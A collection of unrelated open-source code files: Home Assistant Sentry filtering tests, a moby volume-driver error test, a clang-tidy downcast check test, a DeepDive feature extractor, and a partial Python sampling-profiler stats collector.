            event={},
            hint={},
        )
    assert result
    assert result["tags"]["integration"] == "hue"
    assert result["tags"]["platform"] == "light"
    assert result["tags"]["custom_component"] == "no"
    # Same flow for a custom component (must be allowed via options).
    current_platform_mock.get().platform_name = "ironing_robot"
    current_platform_mock.get().domain = "switch"
    with patch(
        "homeassistant.components.sentry.entity_platform.current_platform",
        new=current_platform_mock,
    ):
        result = process_before_send(
            hass,
            options={CONF_EVENT_CUSTOM_COMPONENTS: True},
            channel="test",
            huuid="12345",
            system_info={"installation_type": "pytest"},
            custom_components=["ironing_robot"],
            event={},
            hint={},
        )
    assert result
    assert result["tags"]["integration"] == "ironing_robot"
    assert result["tags"]["platform"] == "switch"
    assert result["tags"]["custom_component"] == "yes"
@pytest.mark.parametrize(
    "logger,tags",
    [
        # Third-party logger -> package tag; homeassistant.components.* ->
        # integration (+platform when a submodule is present); custom flag
        # reflects membership in custom_components; helpers get their own tag.
        ("adguard", {"package": "adguard"}),
        (
            "homeassistant.components.hue.coordinator",
            {"integration": "hue", "custom_component": "no"},
        ),
        (
            "homeassistant.components.hue.light",
            {"integration": "hue", "platform": "light", "custom_component": "no"},
        ),
        (
            "homeassistant.components.ironing_robot.switch",
            {
                "integration": "ironing_robot",
                "platform": "switch",
                "custom_component": "yes",
            },
        ),
        (
            "homeassistant.components.ironing_robot",
            {"integration": "ironing_robot", "custom_component": "yes"},
        ),
        ("homeassistant.helpers.network", {"helpers": "network"}),
        ("tuyapi.test", {"package": "tuyapi"}),
    ],
)
async def test_logger_event_extraction(hass: HomeAssistant, logger, tags):
    """Test extraction of information from Sentry logger events."""
    result = process_before_send(
        hass,
        options={
            CONF_EVENT_CUSTOM_COMPONENTS: True,
            CONF_EVENT_THIRD_PARTY_PACKAGES: True,
        },
        channel="test",
        huuid="12345",
        system_info={"installation_type": "pytest"},
        custom_components=["ironing_robot"],
        event={"logger": logger},
        hint={},
    )
    assert result
    assert result["tags"] == {
        "channel": "test",
        "uuid": "12345",
        "installation_type": "pytest",
        **tags,
    }
@pytest.mark.parametrize(
    "logger,options,event",
    [
        # Third-party and custom-component log events are forwarded only
        # when the matching option is enabled; otherwise dropped (None).
        ("adguard", {CONF_EVENT_THIRD_PARTY_PACKAGES: True}, True),
        ("adguard", {CONF_EVENT_THIRD_PARTY_PACKAGES: False}, False),
        (
            "homeassistant.components.ironing_robot.switch",
            {CONF_EVENT_CUSTOM_COMPONENTS: True},
            True,
        ),
        (
            "homeassistant.components.ironing_robot.switch",
            {CONF_EVENT_CUSTOM_COMPONENTS: False},
            False,
        ),
    ],
)
async def test_filter_log_events(hass: HomeAssistant, logger, options, event):
    """Test filtering of events based on configuration options."""
    result = process_before_send(
        hass,
        options=options,
        channel="test",
        huuid="12345",
        system_info={"installation_type": "pytest"},
        custom_components=["ironing_robot"],
        event={"logger": logger},
        hint={},
    )
    if event:
        assert result
    else:
        assert result is None
@pytest.mark.parametrize(
    "handled,options,event",
    [
        # Handled exceptions are dropped only when CONF_EVENT_HANDLED is off;
        # unhandled ones always pass.
        ("yes", {CONF_EVENT_HANDLED: True}, True),
        ("yes", {CONF_EVENT_HANDLED: False}, False),
        ("no", {CONF_EVENT_HANDLED: False}, True),
        ("no", {CONF_EVENT_HANDLED: True}, True),
    ],
)
async def test_filter_handled_events(hass: HomeAssistant, handled, options, event):
    """Tests filtering of handled events based on configuration options."""
    # NOTE(review): __iter__ is assigned a plain list, not an iterator
    # factory — presumably only __contains__ and .tags are exercised by
    # process_before_send; confirm before relying on iteration.
    event_mock = MagicMock()
    event_mock.__iter__ = ["tags"]
    event_mock.__contains__ = lambda _, val: val == "tags"
    event_mock.tags = {"handled": handled}
    result = process_before_send(
        hass,
        options=options,
        channel="test",
        huuid="12345",
        system_info={"installation_type": "pytest"},
        custom_components=[],
        event=event_mock,
        hint={},
    )
    if event:
        assert result
    else:
        assert result is None
|
unknown
|
codeparrot/codeparrot-clean
| ||
package drivers
import (
"fmt"
"net/http"
"net/http/httptest"
"net/url"
"strings"
"testing"
"github.com/docker/go-connections/tlsconfig"
"github.com/moby/moby/v2/pkg/plugins"
)
// TestVolumeRequestError verifies that every volume-driver proxy method
// surfaces the error string returned by the plugin endpoint.
func TestVolumeRequestError(t *testing.T) {
	mux := http.NewServeMux()
	server := httptest.NewServer(mux)
	defer server.Close()
	// Each endpoint answers with a driver-level error payload.
	mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Cannot create volume"}`)
	})
	mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Cannot remove volume"}`)
	})
	mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Cannot mount volume"}`)
	})
	mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Cannot unmount volume"}`)
	})
	mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Unknown volume"}`)
	})
	mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Cannot list volumes"}`)
	})
	mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		fmt.Fprintln(w, `{"Err": "Cannot get volume"}`)
	})
	// Capabilities fails at the transport level instead (HTTP 500).
	mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", plugins.VersionMimetype)
		http.Error(w, "error", http.StatusInternalServerError)
	})
	u, _ := url.Parse(server.URL)
	client, err := plugins.NewClient("tcp://"+u.Host, &tlsconfig.Options{InsecureSkipVerify: true})
	if err != nil {
		t.Fatal(err)
	}
	driver := volumeDriverProxy{client}
	if err = driver.Create("volume", nil); err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Cannot create volume") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	_, err = driver.Mount("volume", "123")
	if err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Cannot mount volume") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	err = driver.Unmount("volume", "123")
	if err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Cannot unmount volume") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	err = driver.Remove("volume")
	if err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Cannot remove volume") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	_, err = driver.Path("volume")
	if err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Unknown volume") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	_, err = driver.List()
	if err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Cannot list volumes") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	_, err = driver.Get("volume")
	if err == nil {
		t.Fatal("Expected error, was nil")
	}
	if !strings.Contains(err.Error(), "Cannot get volume") {
		t.Fatalf("Unexpected error: %v\n", err)
	}
	_, err = driver.Capabilities()
	if err == nil {
		// BUG FIX: was t.Fatal(err), which reports a nil error and hides
		// the actual failure; report like the other cases.
		t.Fatal("Expected error, was nil")
	}
}
|
go
|
github
|
https://github.com/moby/moby
|
daemon/volume/drivers/proxy_test.go
|
// RUN: %check_clang_tidy -check-suffixes=NSTRICT,STRICT %s cppcoreguidelines-pro-type-static-cast-downcast %t
// RUN: %check_clang_tidy -check-suffix=NSTRICT %s cppcoreguidelines-pro-type-static-cast-downcast %t -- -config="{CheckOptions: {cppcoreguidelines-pro-type-static-cast-downcast.StrictMode: false}}"
// Fixture hierarchy: non-polymorphic bases/derived exercise the
// STRICT-mode diagnostics; the polymorphic ones exercise the
// dynamic_cast fix-it path.
class Base {
};
class Derived : public Base {
};
class Base2 {
};
class MultiDerived : public Base, public Base2 {
};
class PolymorphicBase {
public:
  virtual ~PolymorphicBase();
};
class PolymorphicDerived : public PolymorphicBase {
};
class PolymorphicMultiDerived : public Base, public PolymorphicBase {
};
void pointers() {
  // Non-polymorphic pointer downcasts: flagged only in strict mode.
  auto P0 = static_cast<Derived*>(new Base());
  // CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
  const Base* B0;
  auto PC0 = static_cast<const Derived*>(B0);
  // CHECK-MESSAGES-STRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
  auto P1 = static_cast<Base*>(new Derived()); // OK, upcast to a public base
  auto P2 = static_cast<Base*>(new MultiDerived()); // OK, upcast to a public base
  auto P3 = static_cast<Base2*>(new MultiDerived()); // OK, upcast to a public base
}
void pointers_polymorphic() {
  // Polymorphic downcasts: diagnosed in both modes, with a dynamic_cast fix-it.
  auto PP0 = static_cast<PolymorphicDerived*>(new PolymorphicBase());
  // CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
  // CHECK-FIXES-NSTRICT: auto PP0 = dynamic_cast<PolymorphicDerived*>(new PolymorphicBase());
  const PolymorphicBase* B0;
  auto PPC0 = static_cast<const PolymorphicDerived*>(B0);
  // CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:15: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
  // CHECK-FIXES-NSTRICT: auto PPC0 = dynamic_cast<const PolymorphicDerived*>(B0);
  auto B1 = static_cast<PolymorphicBase*>(new PolymorphicDerived()); // OK, upcast to a public base
  auto B2 = static_cast<PolymorphicBase*>(new PolymorphicMultiDerived()); // OK, upcast to a public base
  auto B3 = static_cast<Base*>(new PolymorphicMultiDerived()); // OK, upcast to a public base
}
void arrays() {
  // Array-to-pointer decay followed by a downcast is still flagged (strict).
  Base ArrayOfBase[10];
  auto A0 = static_cast<Derived*>(ArrayOfBase);
  // CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
}
void arrays_polymorphic() {
  // Same as arrays(), but polymorphic: diagnosed in both modes with fix-it.
  PolymorphicBase ArrayOfPolymorphicBase[10];
  auto AP0 = static_cast<PolymorphicDerived*>(ArrayOfPolymorphicBase);
  // CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead
  // CHECK-FIXES-NSTRICT: auto AP0 = dynamic_cast<PolymorphicDerived*>(ArrayOfPolymorphicBase);
}
void references() {
  // Non-polymorphic reference downcasts: flagged only in strict mode.
  Base B0;
  auto R0 = static_cast<Derived&>(B0);
  // CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
  Base& RefToBase = B0;
  auto R1 = static_cast<Derived&>(RefToBase);
  // CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
  const Base& ConstRefToBase = B0;
  auto RC1 = static_cast<const Derived&>(ConstRefToBase);
  // CHECK-MESSAGES-STRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
  Derived RD1;
  auto R2 = static_cast<Base&>(RD1); // OK, upcast to a public base
}
void references_polymorphic() {
  // Polymorphic reference downcasts: diagnosed in both modes with fix-it.
  PolymorphicBase B0;
  auto RP0 = static_cast<PolymorphicDerived&>(B0);
  // CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead
  // CHECK-FIXES-NSTRICT: auto RP0 = dynamic_cast<PolymorphicDerived&>(B0);
  PolymorphicBase& RefToPolymorphicBase = B0;
  auto RP1 = static_cast<PolymorphicDerived&>(RefToPolymorphicBase);
  // CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
  // CHECK-FIXES-NSTRICT: auto RP1 = dynamic_cast<PolymorphicDerived&>(RefToPolymorphicBase);
  const PolymorphicBase& ConstRefToPolymorphicBase = B0;
  auto RPC2 = static_cast<const PolymorphicDerived&>(ConstRefToPolymorphicBase);
  // CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:15: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
  // CHECK-FIXES-NSTRICT: auto RPC2 = dynamic_cast<const PolymorphicDerived&>(ConstRefToPolymorphicBase);
  PolymorphicDerived d1;
  auto RP2 = static_cast<PolymorphicBase&>(d1); // OK, upcast to a public base
}
// Dependent cast in a template: whether this is a downcast depends on the
// instantiation arguments (see templ_bad_call / templ_good_call below).
template<class B, class D>
void templ() {
  auto B0 = static_cast<B*>(new D());
}
// Instantiates templ with B=Derived, D=Base, i.e. a Base* -> Derived*
// downcast inside the template body.
void templ_bad_call() {
  templ<Derived, Base>(); //FIXME: this should trigger a warning
}
// Instantiates templ with B=Base, D=Derived: a plain upcast, never flagged.
void templ_good_call() {
  templ<Base, Derived>(); // OK, upcast to a public base
}
|
cpp
|
github
|
https://github.com/llvm/llvm-project
|
clang-tools-extra/test/clang-tidy/checkers/cppcoreguidelines/pro-type-static-cast-downcast.cpp
|
#! /usr/bin/env python
# DeepDive feature extractor for mention-pair candidates.
# Reads 6-column tab-separated rows on stdin and writes one
# "<relation_id>\t<feature>" line per extracted feature to stdout.
#
# Fix: the original used Python 2 print statements
# ("print >>sys.stderr, ..." and "print expr"), which are syntax errors
# under Python 3; they are converted to print() calls with byte-identical
# output text.
import sys
import ddlib # DeepDive python utility

ARR_DELIM = '~^~'

# For each input tuple
for row in sys.stdin:
    parts = row.strip().split('\t')
    if len(parts) != 6:
        # Malformed row: report and skip instead of crashing the extractor.
        print('Failed to parse row:', row, file=sys.stderr)
        continue
    # Get all fields from a row
    words = parts[0].split(ARR_DELIM)
    relation_id = parts[1]
    # Columns 2-5 are the two mention spans as (start, length) word offsets.
    p1_start, p1_length, p2_start, p2_length = [int(x) for x in parts[2:]]
    # Unpack input into tuples.
    span1 = ddlib.Span(begin_word_id=p1_start, length=p1_length)
    span2 = ddlib.Span(begin_word_id=p2_start, length=p2_length)
    # Features for this pair come in here
    features = set()
    # Feature 1: Bag of words between the two phrases
    words_between = ddlib.tokens_between_spans(words, span1, span2)
    for word in words_between.elements:
        features.add("word_between=" + word)
    # Feature 2: Number of words between the two phrases
    # features.add("num_words_between=%s" % len(words_between.elements))
    # Feature 3: Does the last word (last name) match?
    # last_word_left = ddlib.materialize_span(words, span1)[-1]
    # last_word_right = ddlib.materialize_span(words, span2)[-1]
    # if (last_word_left == last_word_right):
    #     features.add("potential_last_name_match")
    ########################
    # Improved Feature Set #
    ########################
    # # Feature 1: Find out if a lemma of marry occurs.
    # # A better feature would ensure this is on the dependency path between the two.
    # words_between = ddlib.tokens_between_spans(words, span1, span2)
    # lemma_between = ddlib.tokens_between_spans(obj["lemma"], span1, span2)
    # married_words = ['marry', 'widow', 'wife', 'fiancee', 'spouse']
    # non_married_words = ['father', 'mother', 'brother', 'sister', 'son']
    # # Make sure the distance between mention pairs is not too long
    # if len(words_between.elements) <= 10:
    #     for mw in married_words + non_married_words:
    #         if mw in lemma_between.elements:
    #             features.add("important_word=%s" % mw)
    # # Feature 2: Number of words between the two phrases
    # # Intuition: if they are close by, the link may be stronger.
    # l = len(words_between.elements)
    # if l < 5: features.add("few_words_between")
    # else: features.add("many_words_between")
    # # Feature 3: Does the last word (last name) match?
    # last_word_left = ddlib.materialize_span(words, span1)[-1]
    # last_word_right = ddlib.materialize_span(words, span2)[-1]
    # if (last_word_left == last_word_right):
    #     features.add("potential_last_name_match")
    #######################
    # # Use this line if you want to print out all features extracted:
    # ddlib.log(features)
    for feature in features:
        print(str(relation_id) + '\t' + feature)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import collections
import marshal
import pstats
from _colorize import ANSIColors
from .collector import Collector, extract_lineno
from .constants import MICROSECONDS_PER_SECOND, PROFILING_MODE_CPU
class PstatsCollector(Collector):
    """Aggregate sampled stack frames into pstats-compatible statistics.

    Each sample's frame stack is folded into per-location counters
    (direct vs. cumulative presence), which create_stats() then converts
    into the (cc, nc, tt, ct, callers) tuples that pstats consumes.
    """

    def __init__(self, sample_interval_usec, *, skip_idle=False):
        # Per-location counters keyed by (filename, lineno, funcname).
        # total_rec_calls is kept for pstats-tuple parity; only
        # direct_calls and cumulative_calls are updated here.
        self.result = collections.defaultdict(
            lambda: dict(total_rec_calls=0, direct_calls=0, cumulative_calls=0)
        )
        # Final pstats-format mapping, filled by create_stats().
        self.stats = {}
        self.sample_interval_usec = sample_interval_usec
        # callers[callee][caller] -> weighted co-occurrence count.
        self.callers = collections.defaultdict(
            lambda: collections.defaultdict(int)
        )
        self.skip_idle = skip_idle
        # Scratch set reused across _process_frames calls to dedupe
        # locations within one stack (avoids reallocating per sample).
        self._seen_locations = set()

    def _process_frames(self, frames, weight=1):
        """Process a single thread's frame stack."""
        if not frames:
            return
        self._seen_locations.clear()
        # Process each frame in the stack to track cumulative calls
        # frame.location is int, tuple (lineno, end_lineno, col_offset, end_col_offset), or None
        for frame in frames:
            lineno = extract_lineno(frame.location)
            location = (frame.filename, lineno, frame.funcname)
            # Count each location at most once per stack so recursion does
            # not inflate the cumulative counter.
            if location not in self._seen_locations:
                self._seen_locations.add(location)
                self.result[location]["cumulative_calls"] += weight
        # The top frame gets counted as an inline call (directly executing)
        top_lineno = extract_lineno(frames[0].location)
        top_location = (frames[0].filename, top_lineno, frames[0].funcname)
        self.result[top_location]["direct_calls"] += weight
        # Track caller-callee relationships for call graph
        for i in range(1, len(frames)):
            callee_frame = frames[i - 1]
            caller_frame = frames[i]
            callee_lineno = extract_lineno(callee_frame.location)
            caller_lineno = extract_lineno(caller_frame.location)
            callee = (callee_frame.filename, callee_lineno, callee_frame.funcname)
            caller = (caller_frame.filename, caller_lineno, caller_frame.funcname)
            self.callers[callee][caller] += weight

    def collect(self, stack_frames, timestamps_us=None):
        """Fold one batch of sampled stacks into the counters.

        When timestamps_us is given, each stack is weighted by the number
        of timestamps (i.e. how many sampling ticks it represents).
        """
        weight = len(timestamps_us) if timestamps_us else 1
        for frames, _ in self._iter_stacks(stack_frames, skip_idle=self.skip_idle):
            self._process_frames(frames, weight=weight)

    def export(self, filename):
        """Finalize the stats and marshal them to *filename*."""
        self.create_stats()
        self._dump_stats(filename)

    def _dump_stats(self, file):
        """Write self.stats to *file* in marshal format, tagged as sampled."""
        stats_with_marker = dict(self.stats)
        # Sentinel key so loaders can tell sampled data from cProfile data.
        stats_with_marker[("__sampled__",)] = True
        with open(file, "wb") as f:
            marshal.dump(stats_with_marker, f)

    # Needed for compatibility with pstats.Stats
    def create_stats(self):
        """Convert raw counters into pstats (cc, nc, tt, ct, callers) tuples.

        Times are estimated: sample counts multiplied by the sampling
        interval in seconds.
        """
        sample_interval_sec = self.sample_interval_usec / MICROSECONDS_PER_SECOND
        callers = {}
        for fname, call_counts in self.result.items():
            total = call_counts["direct_calls"] * sample_interval_sec
            cumulative_calls = call_counts["cumulative_calls"]
            cumulative = cumulative_calls * sample_interval_sec
            callers = dict(self.callers.get(fname, {}))
            self.stats[fname] = (
                call_counts["direct_calls"], # cc = direct calls for sample percentage
                cumulative_calls, # nc = cumulative calls for cumulative percentage
                total,
                cumulative,
                callers,
            )

    def print_stats(self, sort=-1, limit=None, show_summary=True, mode=None):
        """Print formatted statistics to stdout."""
        # Create stats object
        stats = pstats.SampledStats(self).strip_dirs()
        if not stats.stats:
            print("No samples were collected.")
            if mode == PROFILING_MODE_CPU:
                print("This can happen in CPU mode when all threads are idle.")
            return
        # Get the stats data
        stats_list = []
        for func, (
            direct_calls,
            cumulative_calls,
            total_time,
            cumulative_time,
            callers,
        ) in stats.stats.items():
            stats_list.append(
                (
                    func,
                    direct_calls,
                    cumulative_calls,
                    total_time,
                    cumulative_time,
                    callers,
                )
            )
        # Calculate total samples for percentage calculations (using direct_calls)
        total_samples = sum(
            direct_calls for _, direct_calls, _, _, _, _ in stats_list
        )
        # Sort based on the requested field
        sort_field = sort
        if sort_field == -1: # stdname
            stats_list.sort(key=lambda x: str(x[0]))
        elif sort_field == 0: # nsamples (direct samples)
            stats_list.sort(key=lambda x: x[1], reverse=True) # direct_calls
        elif sort_field == 1: # tottime
            stats_list.sort(key=lambda x: x[3], reverse=True) # total_time
        elif sort_field == 2: # cumtime
            stats_list.sort(key=lambda x: x[4], reverse=True) # cumulative_time
        elif sort_field == 3: # sample%
            stats_list.sort(
                key=lambda x: (x[1] / total_samples * 100)
                if total_samples > 0
                else 0,
                reverse=True, # direct_calls percentage
            )
        elif sort_field == 4: # cumul%
            stats_list.sort(
                key=lambda x: (x[2] / total_samples * 100)
                if total_samples > 0
                else 0,
                reverse=True, # cumulative_calls percentage
            )
        elif sort_field == 5: # nsamples (cumulative samples)
            stats_list.sort(key=lambda x: x[2], reverse=True) # cumulative_calls
        # Apply limit if specified
        if limit is not None:
            stats_list = stats_list[:limit]
        # Determine the best unit for time columns based on maximum values
        max_total_time = max(
            (total_time for _, _, _, total_time, _, _ in stats_list), default=0
        )
        max_cumulative_time = max(
            (cumulative_time for _, _, _, _, cumulative_time, _ in stats_list),
            default=0,
        )
        total_time_unit, total_time_scale = self._determine_best_unit(max_total_time)
        cumulative_time_unit, cumulative_time_scale = self._determine_best_unit(
            max_cumulative_time
        )
        # Define column widths for consistent alignment
        col_widths = {
            "nsamples": 15, # "nsamples" column (inline/cumulative format)
            "sample_pct": 8, # "sample%" column
            "tottime": max(12, len(f"tottime ({total_time_unit})")),
            "cum_pct": 8, # "cumul%" column
            "cumtime": max(12, len(f"cumtime ({cumulative_time_unit})")),
        }
        # Print header with colors and proper alignment
        print(f"{ANSIColors.BOLD_BLUE}Profile Stats:{ANSIColors.RESET}")
        header_nsamples = f"{ANSIColors.BOLD_BLUE}{'nsamples':>{col_widths['nsamples']}}{ANSIColors.RESET}"
        header_sample_pct = f"{ANSIColors.BOLD_BLUE}{'sample%':>{col_widths['sample_pct']}}{ANSIColors.RESET}"
        header_tottime = f"{ANSIColors.BOLD_BLUE}{f'tottime ({total_time_unit})':>{col_widths['tottime']}}{ANSIColors.RESET}"
        header_cum_pct = f"{ANSIColors.BOLD_BLUE}{'cumul%':>{col_widths['cum_pct']}}{ANSIColors.RESET}"
        header_cumtime = f"{ANSIColors.BOLD_BLUE}{f'cumtime ({cumulative_time_unit})':>{col_widths['cumtime']}}{ANSIColors.RESET}"
        header_filename = (
            f"{ANSIColors.BOLD_BLUE}filename:lineno(function){ANSIColors.RESET}"
        )
        print(
            f"{header_nsamples}  {header_sample_pct}  {header_tottime}  {header_cum_pct}  {header_cumtime}  {header_filename}"
        )
        # Print each line with proper alignment
        for (
            func,
            direct_calls,
            cumulative_calls,
            total_time,
            cumulative_time,
            callers,
        ) in stats_list:
            # Calculate percentages
            sample_pct = (
                (direct_calls / total_samples * 100) if total_samples > 0 else 0
            )
            cum_pct = (
                (cumulative_calls / total_samples * 100)
                if total_samples > 0
                else 0
            )
            # Format values with proper alignment - always use A/B format
            nsamples_str = f"{direct_calls}/{cumulative_calls}"
            nsamples_str = f"{nsamples_str:>{col_widths['nsamples']}}"
            sample_pct_str = f"{sample_pct:{col_widths['sample_pct']}.1f}"
            tottime = f"{total_time * total_time_scale:{col_widths['tottime']}.3f}"
            cum_pct_str = f"{cum_pct:{col_widths['cum_pct']}.1f}"
            cumtime = f"{cumulative_time * cumulative_time_scale:{col_widths['cumtime']}.3f}"
            # Format the function name with colors
            func_name = (
                f"{ANSIColors.GREEN}{func[0]}{ANSIColors.RESET}:"
                f"{ANSIColors.YELLOW}{func[1]}{ANSIColors.RESET}("
                f"{ANSIColors.CYAN}{func[2]}{ANSIColors.RESET})"
            )
            # Print the formatted line with consistent spacing
            print(
                f"{nsamples_str}  {sample_pct_str}  {tottime}  {cum_pct_str}  {cumtime}  {func_name}"
            )
        # Print legend
        print(f"\n{ANSIColors.BOLD_BLUE}Legend:{ANSIColors.RESET}")
        print(
            f"  {ANSIColors.YELLOW}nsamples{ANSIColors.RESET}: Direct/Cumulative samples (direct executing / on call stack)"
        )
        print(
            f"  {ANSIColors.YELLOW}sample%{ANSIColors.RESET}: Percentage of total samples this function was directly executing"
        )
        print(
            f"  {ANSIColors.YELLOW}tottime{ANSIColors.RESET}: Estimated total time spent directly in this function"
        )
        print(
            f"  {ANSIColors.YELLOW}cumul%{ANSIColors.RESET}: Percentage of total samples when this function was on the call stack"
        )
        print(
            f"  {ANSIColors.YELLOW}cumtime{ANSIColors.RESET}: Estimated cumulative time (including time in called functions)"
        )
        print(
            f"  {ANSIColors.YELLOW}filename:lineno(function){ANSIColors.RESET}: Function location and name"
        )
        # Print summary of interesting functions if enabled
        if show_summary and stats_list:
            self._print_summary(stats_list, total_samples)

    @staticmethod
    def _determine_best_unit(max_value):
        """Determine the best unit (s, ms, μs) and scale factor for a maximum value."""
        if max_value >= 1.0:
            return "s", 1.0
        elif max_value >= 0.001:
            return "ms", 1000.0
        else:
            return "μs", float(MICROSECONDS_PER_SECOND)

    def _print_summary(self, stats_list, total_samples):
        """Print summary of interesting functions."""
        print(
            f"\n{ANSIColors.BOLD_BLUE}Summary of Interesting Functions:{ANSIColors.RESET}"
        )
        # Aggregate stats by fully qualified function name (ignoring line numbers)
        func_aggregated = {}
        for (
            func,
            direct_calls,
            cumulative_calls,
            total_time,
            cumulative_time,
            callers,
        ) in stats_list:
            # Use filename:function_name as the key to get fully qualified name
            qualified_name = f"{func[0]}:{func[2]}"
            if qualified_name not in func_aggregated:
                func_aggregated[qualified_name] = [
                    0,
                    0,
                    0,
                    0,
                ] # direct_calls, cumulative_calls, total_time, cumulative_time
            func_aggregated[qualified_name][0] += direct_calls
            func_aggregated[qualified_name][1] += cumulative_calls
            func_aggregated[qualified_name][2] += total_time
            func_aggregated[qualified_name][3] += cumulative_time
        # Convert aggregated data back to list format for processing
        aggregated_stats = []
        for qualified_name, (
            prim_calls,
            total_calls,
            total_time,
            cumulative_time,
        ) in func_aggregated.items():
            # Parse the qualified name back to filename and function name
            if ":" in qualified_name:
                filename, func_name = qualified_name.rsplit(":", 1)
            else:
                filename, func_name = "", qualified_name
            # Create a dummy func tuple with filename and function name for display
            dummy_func = (filename, "", func_name)
            aggregated_stats.append(
                (
                    dummy_func,
                    prim_calls,
                    total_calls,
                    total_time,
                    cumulative_time,
                    {},
                )
            )
        # Determine best units for summary metrics
        max_total_time = max(
            (total_time for _, _, _, total_time, _, _ in aggregated_stats),
            default=0,
        )
        max_cumulative_time = max(
            (
                cumulative_time
                for _, _, _, _, cumulative_time, _ in aggregated_stats
            ),
            default=0,
        )
        total_unit, total_scale = self._determine_best_unit(max_total_time)
        cumulative_unit, cumulative_scale = self._determine_best_unit(
            max_cumulative_time
        )

        def _format_func_name(func):
            """Format function name with colors."""
            return (
                f"{ANSIColors.GREEN}{func[0]}{ANSIColors.RESET}:"
                f"{ANSIColors.YELLOW}{func[1]}{ANSIColors.RESET}("
                f"{ANSIColors.CYAN}{func[2]}{ANSIColors.RESET})"
            )

        def _print_top_functions(stats_list, title, key_func, format_line, n=3):
            """Print top N functions sorted by key_func with formatted output."""
            print(f"\n{ANSIColors.BOLD_BLUE}{title}:{ANSIColors.RESET}")
            sorted_stats = sorted(stats_list, key=key_func, reverse=True)
            for stat in sorted_stats[:n]:
                if line := format_line(stat):
                    print(f"  {line}")

        # Functions with highest direct/cumulative ratio (hot spots)
        def format_hotspots(stat):
            func, direct_calls, cumulative_calls, total_time, _, _ = stat
            if direct_calls > 0 and cumulative_calls > 0:
                ratio = direct_calls / cumulative_calls
                direct_pct = (
                    (direct_calls / total_samples * 100)
                    if total_samples > 0
                    else 0
                )
                return (
                    f"{ratio:.3f} direct/cumulative ratio, "
                    f"{direct_pct:.1f}% direct samples: {_format_func_name(func)}"
                )
            return None

        _print_top_functions(
            aggregated_stats,
            "Functions with Highest Direct/Cumulative Ratio (Hot Spots)",
            key_func=lambda x: (x[1] / x[2]) if x[2] > 0 else 0,
            format_line=format_hotspots,
        )

        # Functions with highest call frequency (cumulative/direct difference)
        def format_call_frequency(stat):
            func, direct_calls, cumulative_calls, total_time, _, _ = stat
            if cumulative_calls > direct_calls:
                call_frequency = cumulative_calls - direct_calls
                cum_pct = (
                    (cumulative_calls / total_samples * 100)
                    if total_samples > 0
                    else 0
                )
                return (
                    f"{call_frequency:d} indirect calls, "
                    f"{cum_pct:.1f}% total stack presence: {_format_func_name(func)}"
                )
            return None

        _print_top_functions(
            aggregated_stats,
